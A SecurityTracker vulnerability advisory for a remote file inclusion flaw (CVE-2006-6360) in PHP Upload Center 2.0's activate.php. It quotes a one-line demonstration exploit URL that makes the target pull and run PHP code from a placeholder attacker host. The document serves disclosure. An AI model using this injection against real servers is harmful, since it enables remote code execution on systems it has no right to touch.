SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   PHP Upload Center Vendors:   Korostel, Sergey
PHP Upload Center Include File Bug in 'activate.php' Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1017329
SecurityTracker URL:  http://securitytracker.com/id/1017329
CVE Reference:   CVE-2006-6360   (Links to External Site)
Updated:  May 22 2008
Original Entry Date:  Dec 4 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 2.0
Description:   A vulnerability was reported in PHP Upload Center. A remote user can include and execute arbitrary code on the target system.

The 'activate.php' script does not properly validate user-supplied input in the 'footerpage' parameter when an invalid 'language' parameter is specified. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/[path]/activate.php?language=conf&footerpage=http://evil?

GregStar discovered this vulnerability.

The original advisory is available at:

http://milw0rm.com/exploits/2886

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents



[Original Message Not Available for Viewing]


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC